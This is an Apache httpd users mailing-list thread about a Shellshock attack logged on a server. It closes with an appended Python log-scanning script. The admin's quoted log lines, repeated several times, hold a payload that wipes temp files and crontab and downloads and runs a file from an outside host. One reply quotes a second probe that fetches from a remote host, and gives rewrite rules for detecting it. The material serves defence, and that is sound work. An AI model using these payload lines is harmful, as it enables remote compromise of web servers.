Posted to users@httpd.apache.org by Victor Sterpu <vi...@casnt.ro> on 2015/07/02 14:00:29 UTC

[users@httpd] Security question

Hello

A hacker attacked an apache2 web server by HTTP injection.
The log shows what he has done:
62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper 
HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: 
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm 
-rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; 
crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif 
print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O 
http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

How can I prevent this in the future and how can I reproduce?
I tried to reproduce it, but it is not clear how he launched this command, and I 
want to know so I can test my vulnerabilities in the future.
The path "/phppath/cgi_wrapper" doesn't exist at all.

Thank you

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


[users@httpd] Security question

Posted by "Bremser, Kurt (AMOS Austria GmbH)" <Ku...@allianz.at>.
So you have CGI enabled on the document root?

Kurt Bremser
AMOS Austria

Newton was wrong. There is no gravity. The Earth sucks.
________________________________
From: Victor Sterpu [victor@casnt.ro]
Sent: Friday, 3 July 2015 08:16
To: users@httpd.apache.org
Subject: **SPAM?** Re: [users@httpd] Security question [wd-vc]

"sc.gif" was executed.

On 03.07.2015 09:05, Bremser, Kurt (AMOS Austria GmbH) wrote:
I guess that the 200 comes from the fact that apache simply delivered the /index.html page.
Or did you find that "sc.gif" was transferred and executed?

Kurt Bremser
AMOS Austria

Newton was wrong. There is no gravity. The Earth sucks.
________________________________
From: Victor Sterpu [victor@casnt.ro]
Sent: Thursday, 2 July 2015 14:29
To: users@httpd.apache.org
Subject: **SPAM?** Re: [users@httpd] Security question [wd-vc]

In the end the attack was successful. The log shows the last command:
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

But I don't know how he launched this script.
How can I prevent this?
I was hoping the server would execute only local scripts; is there something I can do to allow only local scripts to be executed?


On 02.07.2015 15:13, Yehuda Katz wrote:

It is an attempt to exploit a specific configuration. By the fact that apache returned a 404 (the log line says so), you can see that attempt was not successful.

- Y

Sent from a gizmo with a very small keyboard and hyperactive autocorrect.

On Jul 2, 2015 8:00 AM, "Victor Sterpu" <vi...@casnt.ro> wrote:
Hello

A hacker attacked an apache2 web server by HTTP injection.
The log shows what he has done:
62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

How can I prevent this in the future and how can I reproduce?
I tried to reproduce it, but it is not clear how he launched this command, and I want to know so I can test my vulnerabilities in the future.
The path "/phppath/cgi_wrapper" doesn't exist at all.

Thank you




AMOS Austria GmbH
1130 Wien, Hietzinger Kai 101-105
FN 365014k, Handelsgericht Wien
UID: ATU 66614737

http://www.allianz.at

********************************************************
This e-mail and any attachments to it contain information
that is confidential and intended exclusively for the
named addressee(s).
If you are not the named addressee, you may neither make
this e-mail and any attachments accessible to other persons
nor use them in any other way.
If you are not the intended recipient, we ask you to delete
this e-mail and all attached files.

Please note: This email and any files transmitted with it is
intended only for the named recipients and may contain
confidential and/or privileged information. If you are not the
intended recipient, please do not read, copy, use or disclose
the contents of this communication to others and notify the
sender immediately. Then please delete the email and any
copies of it. Thank you.
********************************************************



Re: [users@httpd] Security question

Posted by Victor Sterpu <vi...@casnt.ro>.
"sc.gif" was executed.

On 03.07.2015 09:05, Bremser, Kurt (AMOS Austria GmbH) wrote:
> I guess that the 200 comes from the fact that apache simply delivered 
> the /index.html page.
> Or did you find that "sc.gif" was transferred and executed?
> Kurt Bremser
> AMOS Austria
> Newton was wrong. There is no gravity. The Earth sucks.
> ------------------------------------------------------------------------
> *From:* Victor Sterpu [victor@casnt.ro]
> *Sent:* Thursday, 2 July 2015 14:29
> *To:* users@httpd.apache.org
> *Subject:* **SPAM?** Re: [users@httpd] Security question [wd-vc]
>
> In the end the attack was successful. The log shows the last command:
> 62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 
> "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: 
> text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm 
> -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; 
> crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif 
> print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl 
> -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
> But I don't know how he launched this script.
> How can I prevent this?
> I was hoping the server would execute only local scripts; is there 
> something I can do to allow only local scripts to be executed?
>
>
> On 02.07.2015 15:13, Yehuda Katz wrote:
>>
>> It is an attempt to exploit a specific configuration. By the fact 
>> that apache returned a 404 (the log line says so), you can see that 
>> attempt was not successful.
>>
>> - Y
>>
>> Sent from a gizmo with a very small keyboard and hyperactive 
>> autocorrect.
>>
>> On Jul 2, 2015 8:00 AM, "Victor Sterpu" <victor@casnt.ro 
>> <ma...@casnt.ro>> wrote:
>>
>>     Hello
>>
>>     A hacker attacked an apache2 web server by HTTP injection.
>>     The log shows what he has done:
>>     62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET
>>     /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() {
>>     :;};/usr/bin/perl -e 'print \"Content-Type:
>>     text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/
>>     ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf
>>     /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl
>>     lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget
>>     http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ;
>>     chmod +x sc.gif ; nohup ./sc.gif & \");'"
>>
>>     How can I prevent this in the future and how can I reproduce?
>>     I tried to reproduce it, but it is not clear how he launched this
>>     command, and I want to know so I can test my vulnerabilities in
>>     the future.
>>     The path "/phppath/cgi_wrapper" doesn't exist at all.
>>
>>     Thank you
>>
>>
>
>


Re: [users@httpd] Security question

Posted by "Bremser, Kurt (AMOS Austria GmbH)" <Ku...@allianz.at>.
I guess that the 200 comes from the fact that apache simply delivered the /index.html page.
Or did you find that "sc.gif" was transferred and executed?

Kurt Bremser
AMOS Austria

Newton was wrong. There is no gravity. The Earth sucks.
________________________________
From: Victor Sterpu [victor@casnt.ro]
Sent: Thursday, 2 July 2015 14:29
To: users@httpd.apache.org
Subject: **SPAM?** Re: [users@httpd] Security question [wd-vc]

In the end the attack was successful. The log shows the last command:
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

But I don't know how he launched this script.
How can I prevent this?
I was hoping the server would execute only local scripts; is there something I can do to allow only local scripts to be executed?


On 02.07.2015 15:13, Yehuda Katz wrote:

It is an attempt to exploit a specific configuration. By the fact that apache returned a 404 (the log line says so), you can see that attempt was not successful.

- Y

Sent from a gizmo with a very small keyboard and hyperactive autocorrect.

On Jul 2, 2015 8:00 AM, "Victor Sterpu" <vi...@casnt.ro> wrote:
Hello

A hacker attacked an apache2 web server by HTTP injection.
The log shows what he has done:
62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

How can I prevent this in the future and how can I reproduce?
I tried to reproduce it, but it is not clear how he launched this command, and I want to know so I can test my vulnerabilities in the future.
The path "/phppath/cgi_wrapper" doesn't exist at all.

Thank you





Re: [users@httpd] Security question

Posted by Eric Covener <co...@gmail.com>.
On Thu, Jul 2, 2015 at 8:29 AM, Victor Sterpu <vi...@casnt.ro> wrote:
> In the end the attack was successful. The log shows the last command:
> 62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-"
> "() { :;};/usr/bin/perl -e 'print \"Content-Type:
> text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf
> /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab
> -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start
> pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O
> http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
> But I don't know how he launched this script.
> How can I prevent this?
> I was hoping the server would execute only local scripts; is there something
> I can do to allow only local scripts to be executed?
>

That doesn't imply it ran; that's a malicious URL. Read up on
shellshock, which is the vuln they're _trying_ to trigger.



Re: [users@httpd] Security question

Posted by Victor Sterpu <vi...@casnt.ro>.
In the end the attack was successful. The log shows the last command:
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 
"-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: 
text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm 
-rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; 
crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif 
print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O 
http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

But I don't know how he launched this script.
How can I prevent this?
I was hoping the server would execute only local scripts; is there 
something I can do to allow only local scripts to be executed?


On 02.07.2015 15:13, Yehuda Katz wrote:
>
> It is an attempt to exploit a specific configuration. By the fact that 
> apache returned a 404 (the log line says so), you can see that attempt 
> was not successful.
>
> - Y
>
> Sent from a gizmo with a very small keyboard and hyperactive autocorrect.
>
> On Jul 2, 2015 8:00 AM, "Victor Sterpu" <victor@casnt.ro 
> <ma...@casnt.ro>> wrote:
>
>     Hello
>
>     A hacker attacked an apache2 web server by HTTP injection.
>     The log shows what he has done:
>     62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET
>     /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl
>     -e 'print \"Content-Type:
>     text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/
>     ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf
>     /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download
>     b f r xx y i.gif print start pscan pnscan ps ; wget
>     http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ;
>     chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
>     How can I prevent this in the future and how can I reproduce?
>     I tried to reproduce it, but it is not clear how he launched this command,
>     and I want to know so I can test my vulnerabilities in the future.
>     The path "/phppath/cgi_wrapper" doesn't exist at all.
>
>     Thank you
>
>


Re: [users@httpd] Security question

Posted by Yehuda Katz <ye...@ymkatz.net>.
It is an attempt to exploit a specific configuration. By the fact that
apache returned a 404 (the log line says so), you can see that attempt was
not successful.

- Y

Sent from a gizmo with a very small keyboard and hyperactive autocorrect.
On Jul 2, 2015 8:00 AM, "Victor Sterpu" <vi...@casnt.ro> wrote:

> Hello
>
> A hacker attacked an apache2 web server by HTTP injection.
> The log shows what he has done:
> 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper
> HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type:
> text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf
> /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab
> -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start
> pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O
> http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
> How can I prevent this in the future and how can I reproduce?
> I tried to reproduce it, but it is not clear how he launched this command, and I
> want to know so I can test my vulnerabilities in the future.
> The path "/phppath/cgi_wrapper" doesn't exist at all.
>
> Thank you
>
>
>

Re: [users@httpd] Security question

Posted by Victor Sterpu <vi...@casnt.ro>.
Yes.

On 02.07.2015 21:16, David Grant wrote:
> Cgi module in php?
>
> Sent from my iPad
>
>> On Jul 2, 2015, at 5:00 AM, Victor Sterpu <vi...@casnt.ro> wrote:
>>
>> Hello
>>
>> A hacker attacked an apache2 web server by HTTP injection.
>> The log shows what he has done:
>> 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
>>
>> How can I prevent this in the future and how can I reproduce?
>> I tried to reproduce it, but it is not clear how he launched this command, and I want to know so I can test my vulnerabilities in the future.
>> The path "/phppath/cgi_wrapper" doesn't exist at all.
>>
>> Thank you
>>
>




Re: [users@httpd] Security question

Posted by David Grant <dm...@infinitydigital.com>.
Cgi module in php?

Sent from my iPad

> On Jul 2, 2015, at 5:00 AM, Victor Sterpu <vi...@casnt.ro> wrote:
> 
> Hello
> 
> A hacker attacked an apache2 web server by HTTP injection.
> The log shows what he has done:
> 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
> 
> How can I prevent this in the future and how can I reproduce?
> I tried to reproduce it, but it is not clear how he launched this command, and I want to know so I can test my vulnerabilities in the future.
> The path "/phppath/cgi_wrapper" doesn't exist at all.
> 
> Thank you
> 
> 



Re: [users@httpd] Security question

Posted by Victor Sterpu <vi...@casnt.ro>.
On 02.07.2015 17:55, Kurtis Rader wrote:
> On Thu, Jul 2, 2015 at 5:00 AM, Victor Sterpu <victor@casnt.ro 
> <ma...@casnt.ro>> wrote:
>
>     A hacker attacked an apache2 web server by HTTP injection.
>     The log shows what he has done:
>     62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET
>     /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl
>     -e 'print \"Content-Type:
>     text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/
>     ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf
>     /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download
>     b f r xx y i.gif print start pscan pnscan ps ; wget
>     http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ;
>     chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
>     How can I prevent this in the future and how can I reproduce?
>     I tried to reproduce it, but it is not clear how he launched this command,
>     and I want to know so I can test my vulnerabilities in the future.
>     The path "/phppath/cgi_wrapper" doesn't exist at all.
>
>
> That's a shellshock attack. I use the following rewrite rule to detect 
> them so my monitoring software can automatically block the source of 
> the attack. The /blocked.php script sets the HTTP status to 400.
>
> # This protects against attempts to exploit the Bash execution bug (known as
> # "shellshock"). We're not susceptible to the attack but this makes it easy to
> # spot the attack and blackhole the source. See
> # http://en.wikipedia.org/wiki/Shellshock_%28software_bug%29).
> RewriteCond %{QUERY_STRING} ^.*=\(\) [OR]
> RewriteCond %{HTTP_REFERER} ^\(\)\s{ [OR]
> RewriteCond %{HTTP_COOKIE} ^\(\)\s{ [OR]
> RewriteCond %{HTTP_USER_AGENT} ^\(\)\s{
> RewriteRule ^ /blocked.php [END,E=error-notes:shellshock-exploit]
> Here's the log entry for the most recent attack the above rule caught 
> (I have a custom log format):
>
> 2015-06-28T06:08:02 1435496882.639185 400 shellshock-exploit 6491 616
> 194.8.18.88 75.101.21.75 "GET / HTTP/1.0" "() { :;}; /bin/bash -c \"wget -O
> /tmp/bbb dprftp.asuscomm.com/novo.php?ip=37352e3130312e32312e3735\""
>
>
> -- 
> Kurtis Rader
> Caretaker of the exceptional canines Junior and Hank

Thank you.

Re: [users@httpd] Security question

Posted by Kurtis Rader <kr...@skepticism.us>.
On Thu, Jul 2, 2015 at 5:00 AM, Victor Sterpu <vi...@casnt.ro> wrote:

> A hacker attacked an apache2 web server by HTTP injection.
> The log shows what he has done:
> 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper
> HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type:
> text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf
> /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab
> -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start
> pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O
> http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
> How can I prevent this in the future and how can I reproduce?
> I tried to reproduce it, but it is not clear how he launched this command, and I
> want to know so I can test my vulnerabilities in the future.
> The path "/phppath/cgi_wrapper" doesn't exist at all.
>

That's a shellshock attack. I use the following rewrite rule to detect them
so my monitoring software can automatically block the source of the attack.
The /blocked.php script sets the HTTP status to 400.

# This protects against attempts to exploit the Bash execution bug (known as
# "shellshock"). We're not susceptible to the attack but this makes it easy to
# spot the attack and blackhole the source. See
# http://en.wikipedia.org/wiki/Shellshock_%28software_bug%29).
RewriteCond %{QUERY_STRING} ^.*=\(\) [OR]
RewriteCond %{HTTP_REFERER} ^\(\)\s{ [OR]
RewriteCond %{HTTP_COOKIE} ^\(\)\s{ [OR]
RewriteCond %{HTTP_USER_AGENT} ^\(\)\s{
RewriteRule ^ /blocked.php [END,E=error-notes:shellshock-exploit]

Here's the log entry for the most recent attack the above rule caught (I
have a custom log format):

2015-06-28T06:08:02 1435496882.639185 400 shellshock-exploit 6491 616
194.8.18.88 75.101.21.75 "GET / HTTP/1.0" "() { :;}; /bin/bash -c \"wget -O
/tmp/bbb dprftp.asuscomm.com/novo.php?ip=37352e3130312e32312e3735\""


-- 
Kurtis Rader
Caretaker of the exceptional canines Junior and Hank
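Kurtis's RewriteCond rules catch the Shellshock function-definition prefix at request time, in the query string, Referer, Cookie and User-Agent. Victor's other need is the after-the-fact one: find every probe already sitting in the access log and which hosts sent them. The script below is an added example, not code from the thread or from any of the posters; it applies the same tests to the fields an Apache "combined" log records. Assumptions: the sample log is constructed (the first two lines are modelled on the entries quoted in the thread with the system(...) part of the User-Agent dropped, the other three are made up with RFC 5737 documentation addresses); the prefix pattern uses `\s*` where Kurtis's uses a single `\s`, so it also matches `(){` and `()  {`; and a Cookie field is only present if the LogFormat was extended with `%{Cookie}i`.

```python
"""Offline scan of Apache combined-format access logs for Shellshock probes.
Added example, not code from the thread; mirrors the RewriteCond tests."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional
from urllib.parse import unquote, urlsplit

# Bash function-definition prefix "() {" at the start of a header value.
# Assumption: \s* generalises Kurtis's single \s, so "(){" and "()  {" also hit.
FUNC_PREFIX = re.compile(r"^\(\)\s*\{")
# "=()" anywhere in the (decoded) query string, as in the QUERY_STRING condition.
QS_PATTERN = re.compile(r"=\(\)")


@dataclass
class Finding:
    host: str
    time: str
    status: int
    field: str   # request field that carried the pattern
    value: str   # start of that field, for the report


def tokenize(line: str) -> List[str]:
    """Split a combined-log line into fields, honouring [...] and "...".
    Apache escapes quotes and backslashes inside a quoted field with a
    backslash; each escape pair is kept verbatim."""
    tokens, i, n = [], 0, len(line)
    while i < n:
        c = line[i]
        if c == " ":
            i += 1
        elif c == "[":
            j = line.find("]", i)
            j = n if j == -1 else j
            tokens.append(line[i + 1:j])
            i = j + 1
        elif c == '"':
            j, buf = i + 1, []
            while j < n and line[j] != '"':
                step = 2 if line[j] == "\\" and j + 1 < n else 1
                buf.append(line[j:j + step])
                j += step
            tokens.append("".join(buf))
            i = j + 1
        else:
            j = line.find(" ", i)
            j = n if j == -1 else j
            tokens.append(line[i:j])
            i = j
    return tokens


def parse(line: str) -> Optional[dict]:
    """Return the fields the detector needs, or None for a malformed line."""
    t = tokenize(line)
    if len(t) < 9 or not t[5].isdigit():
        return None
    req = t[4].split(" ")                      # "GET /path?query HTTP/1.1"
    target = req[1] if len(req) >= 2 else ""
    return {
        "host": t[0], "time": t[3], "status": int(t[5]),
        "query": unquote(urlsplit(target).query),
        "referer": t[7], "user-agent": t[8],
        # only present if LogFormat was extended with "%{Cookie}i"
        "cookie": t[9] if len(t) > 9 else None,
    }


def scan(lines: Iterable[str]) -> List[Finding]:
    """One Finding per request whose query, Referer, User-Agent or Cookie
    carries the Shellshock pattern. The status is reported, not interpreted."""
    findings = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        checks = [("query", rec["query"], QS_PATTERN.search),
                  ("referer", rec["referer"], FUNC_PREFIX.match),
                  ("user-agent", rec["user-agent"], FUNC_PREFIX.match),
                  ("cookie", rec["cookie"], FUNC_PREFIX.match)]
        for field, value, test in checks:
            if value and test(value):
                findings.append(Finding(rec["host"], rec["time"], rec["status"],
                                        field, value[:60]))
                break
    return findings


def offending_hosts(findings: Iterable[Finding]) -> List[str]:
    """Distinct source addresses, for a blocklist or a ticket."""
    return sorted({f.host for f in findings})


# Constructed sample log: lines 1-2 are modelled on the thread's entries
# (system(...) part dropped), lines 3-5 are made up (RFC 5737 addresses).
SAMPLE_LOG = r"""
62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";'"
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";'"
203.0.113.7 - - [01/Jul/2015:18:00:00 +0300] "GET /index.html HTTP/1.1" 200 885 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [01/Jul/2015:18:05:12 +0300] "GET /cgi-bin/status?x=()%20%7B%20:;%20%7D HTTP/1.1" 404 280 "-" "curl/7.38.0"
192.0.2.44 - - [01/Jul/2015:18:09:30 +0300] "GET / HTTP/1.1" 200 885 "() { :;};echo probe" "Wget/1.16"
""".strip().splitlines()

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f"{f.time}  {f.host:<13} {f.status}  {f.field:<10} {f.value}")
    print("hosts to review:", ", ".join(offending_hosts(hits)))
```

Run it against a real log with `scan(open("/var/log/apache2/access.log"))`. The status code is reported but deliberately not interpreted: as Eric and Kurt say, a 200 only shows the page was served and a 404 only that the CGI path did not exist; whether the payload ran depends on the request reaching a bash-backed CGI on a host whose bash was not yet patched, which is what a Shellshock check of the server itself, not the log, answers.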